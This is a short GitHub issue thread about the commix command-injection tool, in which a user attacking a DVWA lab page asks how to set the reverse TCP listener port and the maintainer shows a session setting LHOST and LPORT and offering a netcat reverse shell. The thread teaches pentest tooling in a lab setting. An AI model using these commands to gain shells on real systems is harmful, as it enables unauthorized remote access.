### ISSUE TITLE
reverse_tcp_lport doens´t show

### ISSUE THREAD

**Issue by rigelforneris** [commixproject/commix#49]
Hi!

When i start the commix with the following:

commix --url="http://192.168.1.81/dvwa/vulnerabilities/exec/" --data="ip=INJECT_HERE&submit=submit" --cookie="security=low; PHPSESSID=2a6cbc4696fc66a74670d663d7cc77f9"

I got the pseudo-terminal shell but, when i call the option "reverse_tcp" it just show "reverse_tcp" on the command line, where is the reverse_tcp_lport option? When i call the options (the ? option) i cant see anything about this. Any documentation about this will be welcome.

Thanks.

**Comment by stasinopoulos** [comment]
Hey @rigelforneris, use the `set` option (like the MSF) in order to set the `LHOST` and the `LPORT. 
Below follows an example:

```
Pseudo-Terminal (type '?' for available options)
commix(os_shell) > reverse_tcp
commix(reverse_tcp) > set LPORT 1234
LPORT => 1234
commix(reverse_tcp) > set LHOST 192.168.2.7
LHOST => 192.168.2.7
   
  ---[ Reverse TCP shells ]---     
  Type '1' to use a netcat reverse TCP shell.
  Type '2' for other reverse TCP shells.

commix(reverse_tcp) > 

```
